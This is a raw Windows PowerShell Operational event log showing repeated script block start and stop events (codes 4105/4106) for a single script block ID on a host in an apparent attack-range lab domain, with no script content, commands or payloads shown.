Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470237
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470236
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470235
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470234
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470233
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470232
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470231
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470230
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470229
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470228
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470227
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470226
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470225
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470224
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470223
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470222
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470221
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470220
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470219
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470218
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470217
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470216
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470215
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470214
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470213
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470212
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470211
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470210
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470209
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470208
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470207
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470206
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470205
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470204
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470203
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470202
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470201
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470200
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470199
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470198
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470197
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470196
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470195
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470194
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470193
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470192
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470191
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470190
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470189
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470188
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470187
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470186
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470185
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470184
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470183
Keywords=None
